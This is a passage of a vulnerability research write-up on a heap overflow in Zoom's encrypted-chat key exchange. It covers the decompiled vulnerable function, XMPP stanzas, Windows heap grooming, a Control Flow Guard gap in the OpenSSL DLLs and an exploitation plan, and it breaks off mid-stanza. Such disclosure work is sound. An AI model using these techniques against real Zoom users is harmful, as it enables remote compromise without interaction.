We had not yet decided between Zoom and Microsoft Teams, so we made a guess at which type of vulnerability would most likely lead to RCE in each application. Microsoft Teams is developed using Electron with a few native libraries in C++ (mainly for platform integration). Electron apps are built using HTML+JavaScript with a Chromium runtime included. The most likely path for exploitation would therefore be a cross-site scripting issue, possibly in combination with a sandbox escape. Memory corruption could be possible, but the number of native libraries is small. Zoom is written in C++, meaning the most likely vulnerability class would be memory corruption. Without any good data on which would be more likely, we decided on Zoom, simply because we like doing research on memory corruption more than XSS.
Step 1: What is this "Zoom"?
Neither of us had used Zoom much (if at all). So, our very first step was to go through the application thoroughly, focused on identifying all ways you can send something to another user, as that was the vector we wanted for the attack. That turned out to be quite a list. Most users will mainly know the video chat functionality, but there is also a quite full-featured chat client included, with the ability to send images, create group chats, and much more. Within meetings, there's of course audio and video, but also another way to chat, send files, share the screen, etc. We made a few premium accounts too, to make sure we saw as many of the features as possible.
Step 2: Network interception
The next step was to get visibility into the network communication of the client. We would need to see the contents of the communication in order to be able to send our own malicious traffic. Zoom uses a lot of HTTPS requests (often with JSON or protobufs), but the chat connection itself uses an XMPP connection. Meetings appear to have a number of different options depending on what the network allows, the main one being a custom UDP-based protocol. Using a combination of proxies, modified DNS records, sslsplit and a new CA certificate installed in Windows, we were able to inspect all traffic, including HTTP and XMPP, in our test environment. We initially focused on HTTP and XMPP, as the meeting protocol seemed like a (custom) binary protocol.
Step 3: Disassembly
The following step was to load the relevant binaries in our favorite disassemblers. Because we knew we wanted a vulnerability exploitable from another user, we started with trying to match the handling of incoming XMPP stanzas (a stanza is an XMPP element you can send to another user) to the code. We found that the XMPP XML stream is initially parsed by XmppDll.dll. This DLL is based on the C++ XMPP library gloox. This meant that reverse-engineering this part was quite easy, even for the custom extensions Zoom added.
However, it became quite clear that we weren't going to find any good vulnerabilities here. XmppDll.dll only parses incoming XMPP stanzas and copies the XML data to a new C++ object. No real business logic is implemented here, everything is passed to a callback in a different DLL.
In the next DLLs we hit a bit of a wall. The disassembly of the other DLLs was almost impossible to get through due to a large number of calls to vtables and other DLLs. Almost nothing was available to give us some grip on the disassembled code. The main reason for that was that most DLLs do no logging at all. Logs are of course useful for dynamic analysis, but also for static analysis they can be very useful, as they often reveal function and variable names and give information about what checks are performed. We found that Zoom had generated a log of the installation, but while running it nothing was logged at all.
After reporting a problem through the desktop client, the Support team may ask you to install a special troubleshooting package of Zoom to log more information about your issue and help Zoom engineers investigate the issue. After recreating the issue, these files need to be sent to your Zoom support agent via your existing ticket. The troubleshooting version does not allow Zoom support or engineering access to your computer, but rather just gathers more information about your specific issue.
This suggests that logging is disabled at compile time, but special builds with logging do exist. They are only given out by support to debug a specific issue. For bug bounties any form of social engineering is usually banned. While the Pwn2Own rules don't mention it, we did not want to antagonize Zoom about this. Therefore, we decided to ask for this version. As Zoom was sponsoring Pwn2Own, we thought they might be willing to give us that client if we asked through ZDI, so we did just that. It is not uncommon for companies to offer specific tools for researchers to help in their research, such as test units Tesla can give to interested researchers.
Sadly, Zoom turned this request down - we don't know why. But before we could fall back to any social engineering, we found something else that was almost as good. It turns out Zoom has an SDK that can be used to integrate the Zoom meeting functionality in other applications. This SDK consists of many of the same libraries as the client itself, but in this case these DLL files do have logging present. It doesn't have all of them (some UI-related DLLs are missing), but it has enough to get a good overview of the functionality of the core message handling.
The logging also revealed file names and function names, as can be seen in this disassembled example:
With this we could start looking for bugs in earnest. Specifically, we were looking for any kind of memory corruption vulnerability. These often occur during parsing of data, but in this case that was not a likely vector for the XMPP connection. A well known library is used for XMPP and we would also need to get our payload through the server, so any invalid XML would not get to the other client. Many operations using strings are using C++ std::string objects, which meant that buffer overflows due to mistakes in length calculations are also not very likely.
About 2 weeks after we started this research, we noticed an interesting thing about the base64 decoding that was happening in a couple of places:
EVP_DecodeBlock is the OpenSSL function that handles base64-decoding. Base64 is an encoding that turns three bytes into four characters, so decoding results in something which is always 3/4 of the size of the input (ignoring any rounding). But instead of allocating something of that size, this code is allocating a buffer which is four times larger than the input buffer (shifting left twice is the same as multiplying by four). Allocating something too big is not an exploitable vulnerability (maybe if you trigger an integer overflow, but that's not very practical), but what it did show was that when moving data from and to OpenSSL incorrect calculations of buffer sizes might be present. Here, std::string objects will need to be converted to C char* pointers and separate length variables. So we decided to focus on the calling of OpenSSL functions from Zoom's own code for a while.
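To make the size arithmetic concrete, here is a minimal Python sketch (not Zoom's code). The helper names `decoded_capacity` and `observed_allocation` are our own and only illustrate the two calculations described above: the 3/4 ratio that base64 decoding needs and the "shift left twice" allocation we saw in the decompiled code.

```python
import base64


def decoded_capacity(encoded_len: int) -> int:
    """Upper bound on the decoded size: 3 output bytes per 4 input characters."""
    return (encoded_len // 4) * 3


def observed_allocation(encoded_len: int) -> int:
    """Size used by the decompiled code: the input length shifted left twice."""
    return encoded_len << 2


encoded = base64.b64encode(bytes(range(48)))  # 48 bytes become 64 characters
decoded = base64.b64decode(encoded)

print(len(encoded), len(decoded))          # 64 48
print(decoded_capacity(len(encoded)))      # 48
print(observed_allocation(len(encoded)))   # 256
```

The buffer is more than five times larger than necessary, which is harmless on its own but hints that length calculations around the OpenSSL calls deserve a closer look.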
Step 5: The Bug
Zoom's chat functionality supports a setting named "Advanced chat encryption" (only available for paying users). This functionality has been around for a while. By default version 2 is used, but if a contact sends a message using version 1 then it is still handled. This is what we were looking at, which involves a lot of OpenSSL functions.
Version 1 works more or less like this (as far as we could understand from the code):
The sender sends a message encrypted using a symmetric key, with a key identifier indicating which message key was used.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="85DC3552-56EE-4307-9F10-483A0CA1C611" type="chat">
  <body>[This is an encrypted message]</body>
  <thread>gloox{BFE86A52-2D91-4DA0-8A78-DC93D3129DA0}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="SendMessage">
      <msg>
        <message>/fWuV6UYSwamNEc40VKAnA==</message>
        <iv>sriMTH04EXSPnphTKWuLuQ==</iv>
      </msg>
      <xkey>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="35">
    <nos>You have received an encrypted message.</nos>
  </zmtask>
  <zmext expire_t="1680466611000" t="1617394611169">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
  </zmext>
</message>
The recipient checks to see if they have the symmetric key with that key identifier. If not, the recipient's client automatically sends a RequestKey message to the other user, which includes the recipient's X509 certificate in order to encrypt the message key (<pub_cert>).
The sender responds to the RequestKey message with a ResponseKey message. This contains the sender's X509 certificate in <pub_cert>, an <encoded> XML element, which contains the message key encrypted using both the sender's private key and the recipient's public key, and a signature in <signature>.
The way the key is encrypted has two options, depending on the type of key used by the recipient's certificate. If it uses an RSA key, then the sender encrypts the message key using the public key of the recipient and signs it using their own private RSA key.
The default, however, is not to use RSA but to use an elliptic curve key using the curve P-521. Algorithms for encryption using elliptic curve keys do not exist (as far as we know). So instead of encrypting directly, elliptic curve Diffie-Hellman is used with both users' keys to obtain a shared secret. The shared secret is split into a key and IV to encrypt the message key data with AES. This is a common approach for encrypting data when using elliptic curve cryptography.
When handling a ResponseKey message, a std::string of a fixed size of 1024 bytes was allocated for the decrypted result. When decrypting using RSA, it was properly validated that the decryption result would fit in that buffer. When decrypting using AES, however, that check was missing. This meant that by sending a ResponseKey message with an AES-encrypted <encoded> element of more than 1024 bytes, it was possible to overflow a heap buffer.
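The difference between the two paths can be modelled in a few lines of Python. This is only a sketch of the logic as we understood it, not a reconstruction of Zoom's code: the names `checked_result_length`, `max_bytes_past_end` and `ResultTooLarge` are hypothetical, and the model only tracks lengths rather than performing any real decryption.

```python
OUTPUT_CAPACITY = 1024   # fixed output buffer size described above
AES_BLOCK_SIZE = 16


class ResultTooLarge(Exception):
    """Raised by the checked path when the result would not fit."""


def checked_result_length(result_len, capacity=OUTPUT_CAPACITY):
    """Model of the RSA path: the length is validated before it is used."""
    if result_len > capacity:
        raise ResultTooLarge(f"{result_len} bytes do not fit in {capacity}")
    return result_len


def max_bytes_past_end(ciphertext_len, capacity=OUTPUT_CAPACITY):
    """Model of the AES path: nothing compares the input length to capacity.

    CBC decryption produces at most as many bytes as the ciphertext holds,
    so this is an upper bound on how far the write can run past the buffer.
    """
    if ciphertext_len % AES_BLOCK_SIZE != 0:
        raise ValueError("CBC ciphertext must be a whole number of blocks")
    return max(0, ciphertext_len - capacity)


print(max_bytes_past_end(1024))   # 0
print(max_bytes_past_end(2192))   # 1168
```

A single comparison against the capacity, as in the checked path, would have been enough to prevent the overflow.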
The following snippet shows the function where the overflow happens. This is the SDK version, so with the logging available. Here, param_1[0] is the input buffer, param_1[1] is the input buffer's length, param_1[2] is the output buffer and param_1[3] the output buffer length. This is a large snippet, but the important part of this function is that param_1[3] is only written to with the resulting length, it is not read first. The actual allocation of the buffer happens in a function a few steps earlier.
undefined4 __fastcall AESDecode(undefined4 *param_1, undefined4 *param_2)
{
  char cVar1;
  int iVar2;
  undefined4 uVar3;
  int iVar4;
  LogMessage *this;
  int extraout_EDX;
  int iVar5;
  LogMessage local_180 [176];
  LogMessage local_d0 [176];
  int local_20;
  undefined4 *local_1c;
  int local_18;
  int local_14;
  undefined4 local_8;
  undefined4 uStack4;

  uStack4 = 0x170;
  local_8 = 0x101ba696;
  iVar5 = 0;
  local_14 = 0;
  local_1c = param_2;
  cVar1 = FUN_101ba34a();
  if (cVar1 == '\0') {
    return 1;
  }
  if ((*(uint *)(extraout_EDX + 4) < 0x20) || (*(uint *)(extraout_EDX + 0xc) < 0x10)) {
    iVar5 = logging::GetMinLogLevel();
    if (iVar5 < 2) {
      logging::LogMessage::LogMessage(local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h", 0x1d6, 1);
      local_8 = 0;
      local_14 = 1;
      uVar3 = log_message(iVar5 + 8, "[AESDecode] Failed. Key len or IV len is incorrect.", " ");
      log_message(uVar3);
      logging::LogMessage::~LogMessage(local_d0);
      return 1;
    }
    return 1;
  }
  local_14 = param_1[2];
  local_18 = 0;
  iVar2 = EVP_CIPHER_CTX_new();
  if (iVar2 == 0) {
    return 0xc;
  }
  local_20 = iVar2;
  EVP_CIPHER_CTX_reset(iVar2);
  uVar3 = EVP_aes_256_cbc(0, *local_1c, local_1c[2], 0);
  iVar4 = EVP_CipherInit_ex(iVar2, uVar3);
  if (iVar4 < 1) {
    iVar2 = logging::GetMinLogLevel();
    if (iVar2 < 2) {
      logging::LogMessage::LogMessage(local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h", 0x1e8, 1);
      iVar5 = 2;
      local_8 = 1;
      local_14 = 2;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherInit_ex Failed.", " ");
      log_message(uVar3);
    }
LAB_101ba758:
    if (iVar5 == 0) goto LAB_101ba852;
    this = local_d0;
  }
  else {
    iVar4 = EVP_CipherUpdate(iVar2, local_14, &local_18, *param_1, param_1[1]);
    if (iVar4 < 1) {
      iVar2 = logging::GetMinLogLevel();
      if (iVar2 < 2) {
        logging::LogMessage::LogMessage(local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h", 0x1f0, 1);
        iVar5 = 4;
        local_8 = 2;
        local_14 = 4;
        uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherUpdate Failed.", " ");
        log_message(uVar3);
      }
      goto LAB_101ba758;
    }
    param_1[3] = local_18;
    iVar4 = EVP_CipherFinal_ex(iVar2, local_14 + local_18, &local_18);
    if (0 < iVar4) {
      param_1[3] = param_1[3] + local_18;
      EVP_CIPHER_CTX_free(iVar2);
      return 0;
    }
    iVar2 = logging::GetMinLogLevel();
    if (iVar2 < 2) {
      logging::LogMessage::LogMessage(local_180, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h", 0x1fb, 1);
      iVar5 = 8;
      local_8 = 3;
      local_14 = 8;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherFinal_ex Failed.", " ");
      log_message(uVar3);
    }
    if (iVar5 == 0) goto LAB_101ba852;
    this = local_180;
  }
  logging::LogMessage::~LogMessage(this);
LAB_101ba852:
  EVP_CIPHER_CTX_free(local_20);
  return 0xc;
}
Side note: we don't know the format of what the <encoded> element would normally contain after decryption, but from our understanding of the protocol we assume it contains a key. It was easy to initiate the old version of the protocol against a new client. But to have a legitimate client initiate it requires an old version of the client, which appears to be malfunctioning (it can no longer log in).
We were about 2 weeks into our research and we had found a buffer overflow we could trigger remotely without user interaction by sending a few chat messages to a user who had previously accepted an external contact request or was currently in the same multi-user chat. This was looking promising.
Step 6: Path to exploitation
To build an exploit around it, it is good to first mention some pros and cons of this buffer overflow:
Pro: The size is not directly bounded (implicitly by the maximum size of an XMPP packet, but in practice this is way more than needed).
Pro: The contents are the result of decrypting the buffer, so this can be arbitrary binary data, not limited to printable or non-zero characters.
Pro: It triggers automatically without user interaction (as long as the attacker and victim are contacts).
Con: The size must be a multiple of the AES block size, 16 bytes. There can be padding at the end, but even when padding is present it will still overwrite the data up to a full block before removing the padding.
Con: The heap allocation is of a fixed (and quite large) size: 1040 bytes. (The backing buffer of a std::string on Windows has up to 16 extra bytes for some reason.)
Con: The buffer is allocated and then used for the overflow while handling the same packet. We cannot place the buffer first, allocate something else and then overflow.
We did not yet have a full plan for how to exploit this, but we expected that we would most likely need to overwrite a function pointer or vtable in an object. We already knew OpenSSL was used, and it uses function pointers within structs extensively. We could even create a few already during the later handling of ResponseKey messages. We investigated this, but it quickly turned out to be impossible due to the heap allocator in use.
Step 7: Understanding the Windows heap allocator
To implement our exploit, we needed to fully understand how the heap allocator in Windows places allocations. Windows 10 includes two different heap allocators: the NT Heap and the Segment Heap. The Segment Heap is new in Windows 10 and only used for specific applications, which don't include Zoom, so the NT Heap was used. The NT Heap has two different allocators (for allocations less than about 16 kB): the front-end allocator (known as the Low-Fragmentation Heap or LFH) and the back-end allocator.
Before we go into detail for how those two allocators work, we'll introduce some definitions:
Block: a memory area which can be returned by the allocator, either in use or not.
Bucket: a group of blocks handled by the LFH.
Page: a memory area assigned by the OS to a process.
By default, the back-end allocator handles all allocations. The best way to imagine the back-end allocator is as a sorted list of all free blocks (the freelist). Whenever an allocation request is received for a specific size, the list is traversed until a block is found of at least the requested size. This block is removed from the list and returned. If the block was bigger than the requested size, then it is split and the remainder is inserted in the list again. If no suitable blocks are present, the heap is extended by requesting a new page from the OS, inserting it as a new block at the appropriate location in the list. When an allocation is freed, the allocator first checks if the blocks before and after it are also free. If one or both of them are then those are merged together. The block is inserted into the list again at the location matching its size.
The following video shows how the allocator searches for a block of a specific size (orange), returns it and places the remainder back into the list (green).
The back-end allocator is fully deterministic: if you know the state of the freelist at a certain time and the sequence of allocations and frees that follow, then you can determine the new state of the list. There are some other useful properties too, such as that allocations of a specific size are last-in-first-out: if you allocate a block, free it and immediately allocate the same size, then you will always receive the same address.
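The behaviour described above can be captured in a toy model. The following Python sketch is a strong simplification and not the real NT Heap implementation: the class `BackendHeap` and its methods are our own names, block headers and page requests are left out, and the freelist is simply a list of `(size, address)` pairs kept sorted by size.

```python
import bisect


class BackendHeap:
    """Toy model of the back-end allocator: a size-sorted list of free blocks."""

    def __init__(self, size):
        self.freelist = [(size, 0)]   # (size, address), sorted by size
        self.used = {}                # address -> size

    def alloc(self, size):
        # Walk to the first free block that is at least `size` bytes.
        i = bisect.bisect_left(self.freelist, (size, -1))
        if i == len(self.freelist):
            raise MemoryError("the toy heap is never extended with new pages")
        block_size, addr = self.freelist.pop(i)
        if block_size > size:
            # Split the block and put the remainder back in the list.
            bisect.insort(self.freelist, (block_size - size, addr + size))
        self.used[addr] = size
        return addr

    def free(self, addr):
        size = self.used.pop(addr)
        # Merge with a free block directly before and/or after this one.
        for other in list(self.freelist):
            other_size, other_addr = other
            if other_addr + other_size == addr:
                self.freelist.remove(other)
                addr, size = other_addr, size + other_size
            elif other_addr == addr + size:
                self.freelist.remove(other)
                size += other_size
        bisect.insort(self.freelist, (size, addr))


heap = BackendHeap(4096)
a = heap.alloc(1040)
b = heap.alloc(256)
heap.free(a)
c = heap.alloc(1040)
print(a, b, c)   # 0 1040 0
```

Freeing a block and immediately requesting the same size returns the same address, which is the property we wanted to rely on for placing the overflowing buffer.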
The front-end allocator, or LFH, is used for allocations for sizes that are used often to reduce the amount of fragmentation. If more than 17 blocks of a specific size range are allocated and still in use, then the LFH will start handling that specific size from then on. LFH allocations are grouped in buckets each handling a range of allocation sizes. When a request for a specific size is received, the LFH checks the bucket most recently used for an allocation of that size if it still has room. If it does not, it checks if there are any other buckets for that size range with available room. If there are none, a new bucket is created.
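As a rough illustration of the activation rule, the sketch below counts live allocations per size range and switches a range to the LFH once more than 17 are in use. The class `LfhActivation` is a hypothetical model based only on the description above, and the assumption that the switch is permanent matches what we observed rather than any documented guarantee.

```python
from collections import Counter

LFH_THRESHOLD = 17   # "more than 17 blocks", as described above


class LfhActivation:
    """Toy model: tracks which size ranges have been handed over to the LFH."""

    def __init__(self):
        self.live = Counter()   # size range -> allocations still in use
        self.on_lfh = set()     # size ranges now served by the LFH

    def handler(self, size_range):
        return "LFH" if size_range in self.on_lfh else "back-end"

    def alloc(self, size_range):
        handled_by = self.handler(size_range)
        self.live[size_range] += 1
        if self.live[size_range] > LFH_THRESHOLD:
            self.on_lfh.add(size_range)   # assumed to be a one-way switch
        return handled_by

    def free(self, size_range):
        self.live[size_range] -= 1


model = LfhActivation()
size_range = (1025, 1088)
first_18 = [model.alloc(size_range) for _ in range(18)]
print(set(first_18), model.alloc(size_range))
```

In this model the first 18 allocations are still served by the back-end allocator and every later one by the LFH, even after all earlier blocks are freed.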
No matter if the LFH or back-end allocator is used, each heap allocation (of less than 16 kB) has a header of eight bytes. The first four bytes are encoded, the next four are not. The encoding uses an XOR with a random key, which is used as a security measure against buffer overflows corrupting heap metadata.
For exploiting a heap overflow there are a number of things to consider. The back-end allocator can create adjacent allocations of arbitrary sizes. On the LFH, only objects in the same range are combined in a bucket, so to overwrite a block from a different range you would have to make sure two buckets are placed adjacent. In addition, which free slot from a bucket is used is randomized.
For these reasons we focused initially on the back-end allocator. We quickly realized we couldn't use any of the OpenSSL objects we found previously: when we launch Zoom in a clean state (no existing chat history), all sizes up to around 700 bytes (and many common sizes above it too) would already be handled by the LFH. It is impossible to switch a specific size back from the LFH to the back-end allocator. Therefore, the OpenSSL objects we identified initially would be impossible to allocate after our overflowing block, as they were all less than 700 bytes so guaranteed to be placed in an LFH bucket.
This meant we had to search more thoroughly for objects of larger sizes in which we might be able to overwrite a function pointer or vtable. We found that one of the other DLLs, zWebService.dll, includes a copy of libcurl, which gave us some extra source code to analyze. Analyzing source code was much more efficient than having to obtain information about a C++ object's layout from a decompiler. This did give us some interesting objects to overflow that would not automatically be on the LFH.
Step 8: Heap grooming
In order to place our allocations, we would need to do some extensive heap grooming. We assumed we needed to follow the following procedure:
Allocate a temporary object of 1040 bytes.
Allocate the object we want to overwrite after it.
Free the object of 1040 bytes.
Perform the overflow, hopefully at the same address as the 1040 byte object.
In order to do this, we had to be able to make an allocation of 1040 bytes which we could free at a precise later time. But even more importantly, for this to work we would also need to fill up many holes in the freelist so our two objects would end up adjacent. If we want to allocate the objects directly adjacent, then in the first step there needs to be a free block of size 1040 + x, with x the size of the other object. But this means that there must not be any other allocations of size between 1040 and 1040 + x, otherwise that block would be used instead. This means there is a pretty large range of sizes for which there must not be any free blocks available.
To make arbitrary sized allocations, we stayed close to what we already knew. As we mentioned, if you send an encrypted message with a key identifier the other user does not yet have, then it will request that key. We noticed that this key identifier remained in a std::string in memory, likely because it was waiting for a response. It could be an arbitrary large size, so we had a way to make an allocation. It is also possible to revoke chat messages in Zoom, which would also free the pending key request. This gave us a primitive for allocating and freeing a specific size block, but it was quite crude: it would always allocate 2 copies of that string (for some reason), and in order to handle a new incoming message it would make quite a few temporary copies.
We spent a lot of time making allocations by sending messages and monitoring the state of the freelist. For this, we wrote some Frida scripts for tracking allocations, printing the freelist and checking the LFH status. These things can all be done by WinDBG, but we found it way too slow to be of use. There was one nice trick we could use: if specific allocations could get in the way of our heap grooming, then we could trigger the LFH for that size to make sure it would no longer affect the freelist by making the client perform at least 17 allocations of that size.
We spent a lot of time on this, but we ran into a problem. Sometimes, randomly, our allocation of 1040 bytes would already be placed on the LFH, even if we launched the application in a clean state. At first, we accepted this risk: a chance of around 25% to fail is still quite acceptable for the 3 attempts in Pwn2Own. But the more concrete our grooming became, the more additional objects and sizes we needed to use, such as for the objects from libcurl we might want to overwrite. With more sizes, it would get more and more likely that at least one of them would be handled by the LFH already, completely breaking our exploit. We weren't very keen on participating with an exploit that had already failed 75% of the time by the time the application had finished launching. We had spent a few weeks on trying to gain control over this, but eventually decided to try something else.
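To illustrate how quickly this compounds, the sketch below computes the chance that none of the required sizes is already on the LFH at launch. It rests on two assumptions that we did not measure: that every size has the same 25% chance as the 1040-byte allocation, and that the sizes behave independently. The function name `clean_start_probability` is our own.

```python
def clean_start_probability(num_sizes, p_on_lfh=0.25):
    """Chance that none of `num_sizes` sizes is on the LFH at launch.

    Assumes an identical, independent probability per size (an illustration,
    not a measurement).
    """
    return (1 - p_on_lfh) ** num_sizes


for n in (1, 3, 5):
    print(n, round(clean_start_probability(n), 3))
```

Under these assumptions, needing about five clean sizes already leaves less than a 25% chance of a usable starting state.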
Step 9: To the LFH
We decided to investigate how easy it would be to perform our exploit if we forced the allocation we could overflow to the LFH, using the same method of forcing a size to the LFH first. This meant we had to search more thoroughly for objects of appropriate sizes. The allocation of 1040 bytes is placed in a bucket with all LFH allocations of 1025 bytes to 1088 bytes.
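The size range can be computed from the granularity of the LFH buckets. The table in the sketch below is an assumption taken from publicly available research on the LFH, not something we state elsewhere in this post; it does reproduce the 1025 to 1088 byte range mentioned above. The function name `lfh_size_range` is our own.

```python
# (largest size covered, bucket granularity) -- assumed values from public
# LFH research; only the 1025-2048 row is confirmed by the range above.
GRANULARITY = [
    (256, 8),
    (512, 16),
    (1024, 32),
    (2048, 64),
    (4096, 128),
    (8192, 256),
    (16384, 512),
]


def lfh_size_range(size):
    """Return the (lowest, highest) allocation size sharing a bucket with `size`."""
    if not 1 <= size <= 16384:
        raise ValueError("size is outside the range handled by the LFH")
    for upper, step in GRANULARITY:
        if size <= upper:
            highest = -(-size // step) * step   # round up to a multiple of step
            return highest - step + 1, highest


print(lfh_size_range(1040))   # (1025, 1088)
```

Any object we can allocate with a size in this range is a candidate neighbour for the overflowing buffer.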
Before we go further, let's look at what defensive measures we had to deal with:
ASLR (Address Space Layout Randomization). This means that DLLs are loaded in random locations and the location of the heap and stack are also randomized. However, because Zoom was a 32-bit application, there is not a very large range of possible addresses for DLLs and for the heap.
DEP (Data Execution Prevention). This meant that there were no memory pages present that were both writable and executable.
CFG (Control Flow Guard). This is a relatively new technique that is used to check that function pointers and other dynamic addresses point to a valid start location of a function.
We noticed that ASLR and DEP were used correctly by Zoom, but the use of CFG had a weakness: the 2 OpenSSL DLLs did not have CFG enabled due to an incompatibility in OpenSSL, which was very helpful for us.
CFG works by inserting a check (guard_check_icall) before all dynamic function calls which looks up the address that is about to be called in a list of valid function start addresses. If it is valid, the call is allowed. If not, an exception is raised.
Not enabling CFG for a DLL means two things:
Any dynamic function call by this library does not check if the address is a function start location. In other words, guard_check_icall is not inserted.
Any dynamic function call from another library that does use CFG, and that calls an address in these DLLs, is always allowed. The valid start location list is not present for these DLLs, which means that it allows all addresses in the range of that DLL.
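The effect of mixing modules with and without CFG can be sketched as follows. This Python model is a simplification of the check, not the real implementation: the `Module` class, the module names other than libcrypto-1_1.dll, and all addresses are hypothetical, and only `guard_check_icall` borrows its name from the check described above.

```python
from dataclasses import dataclass, field


@dataclass
class Module:
    name: str
    base: int
    size: int
    cfg_enabled: bool
    function_starts: set = field(default_factory=set)

    def contains(self, address):
        return self.base <= address < self.base + self.size


def guard_check_icall(modules, target):
    """Return True if a CFG-protected caller may call `target`."""
    for module in modules:
        if module.contains(target):
            if not module.cfg_enabled:
                return True   # no list of valid starts: every address passes
            return target in module.function_starts
    return False              # not inside any loaded module


modules = [
    Module("hypothetical_cfg.dll", 0x10000000, 0x10000, True,
           {0x10001000, 0x10002000}),
    Module("libcrypto-1_1.dll", 0x20000000, 0x10000, False),
]

print(guard_check_icall(modules, 0x10001000))   # True: a real function start
print(guard_check_icall(modules, 0x10001004))   # False: middle of a function
print(guard_check_icall(modules, 0x20001234))   # True: anywhere in a non-CFG DLL
```

This is why an overwritten function pointer only needs to point somewhere inside one of the OpenSSL DLLs to pass the check, including into the middle of a function.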
Based on this, we formed the following plan:
Leak an address from one of the two OpenSSL DLLs to deal with ASLR.
Overflow a vtable or function pointer to point to a location in the DLL we have located.
Use a ROP chain to gain arbitrary code execution.
To perform our buffer overflow on the LFH, we needed a way to deal with the randomization. While not perfect, one way we avoided a lot of crashes was to create a lot of new allocations in the size range and then free all but the last one. As we mentioned, the LFH returns a random free slot from the current bucket. If the current bucket is full, it checks whether there are other not yet full buckets of the same size range. If there are none, the heap is extended and a new bucket is created.
By allocating many new blocks, we guaranteed that all buckets for this size range were full and we got a new bucket. Freeing a number of these allocations, but keeping the last block meant we had a lot of room in this bucket. As long as we didn't allocate more blocks than would fit, all allocations of our size range would come from here. This was very helpful for reducing the chance of overwriting other objects that happen to fall in the same size range.
The following video shows the "dangerous" objects we don't want to overwrite in orange, and the safe objects we created in green:
As long as Bucket 3 didn't fill up completely, all allocations for the targeted size range would happen in that bucket, allowing us to avoid overwriting the orange objects. So long as no new "orange" objects were created, we could freely try again and again. The randomization would actually help us ensure that we would eventually obtain the object layout we wanted.
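The grooming strategy can be simulated with a small model of the buckets for one size range. This is a sketch under simplifying assumptions, not the real LFH: the class `LfhSizeRange`, the bucket capacity of 8 slots and the starting layout are all made up for the illustration, and buckets are indexed from 0 here.

```python
import random


class LfhSizeRange:
    """Toy model of the LFH buckets that serve one size range."""

    def __init__(self, slots_per_bucket, rng):
        self.slots_per_bucket = slots_per_bucket
        self.rng = rng
        self.buckets = []     # each bucket is a list of slots; None means free
        self.current = None   # index of the bucket used most recently

    def _pick_bucket(self):
        if self.current is not None and None in self.buckets[self.current]:
            return self.current
        for index, bucket in enumerate(self.buckets):
            if None in bucket:
                return index
        self.buckets.append([None] * self.slots_per_bucket)
        return len(self.buckets) - 1

    def alloc(self, tag):
        index = self._pick_bucket()
        free_slots = [i for i, s in enumerate(self.buckets[index]) if s is None]
        slot = self.rng.choice(free_slots)   # the slot itself is random
        self.buckets[index][slot] = tag
        self.current = index
        return index, slot

    def free(self, index, slot):
        self.buckets[index][slot] = None


heap = LfhSizeRange(slots_per_bucket=8, rng=random.Random(0))
# Starting state: two partly filled buckets with objects we must not overwrite.
heap.buckets = [["danger"] * 6 + [None] * 2, ["danger"] * 5 + [None] * 3]
heap.current = 1

# Spray: 5 allocations fill the holes, 4 more land in a fresh bucket.
spray = [heap.alloc("spray") for _ in range(9)]
for index, slot in spray[:-1]:
    heap.free(index, slot)   # free all but the last one

# Later allocations in this size range now come from the fresh bucket.
later = [heap.alloc("ours") for _ in range(6)]
print(sorted({index for index, _ in later}))   # [2]
```

The position inside the bucket stays random, but as long as the fresh bucket has room, none of the later allocations ends up next to a "dangerous" object.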
Step 10: Info leak
Turning a buffer overflow into an information leak is quite a challenge, as it depends heavily on the functionality which is available in the application. Common ways would be to allocate something which has a length field, overflow over the length field and then read the field. This did not work for us: we did not find any available functionality in Zoom to send something with an allocation of 1025-1088 with a length field and with a way to request it again. It is possible that it does exist, but analyzing the object layout of the C++ objects was a slow process.
We took a good look at the parts we had code for, and we found a method, although it was tricky.
When libcurl is used to request a URL it will parse and encode the URL and copy the relevant fields into an internal structure. The path and query components of the URL are stored in different, heap allocated blocks with a zero-terminator. Any required URL encoding will already have taken place, so when the request is sent the entire string is copied to the socket until it gets to the first null-byte.
We had found a way to initiate HTTPS requests to a server we control. The method was by sending a weird combination of two stanzas Zoom would normally use, one for sending an invitation to add a user and one notifying the user that a new bot was added to their account. A string from the stanza is then appended to a domain to download an image. However, the string of the prepended domain does not end with a /, so it is possible to extend it to end up at a different domain.
A stanza for requesting another user to be added to your contact list:
<presence xmlns="jabber:client" type="subscribe" email="[email of other user]" from="[email protected]/ZoomChat_pc">
  <status>{"e":"[email protected]","screenname":"John Doe","t":1617178959313}</status>
</presence>
The stanza informing a user that a new bot (in this case, SurveyMonkey) was added to their account:
<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc" type="probe">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:1">
    <members>
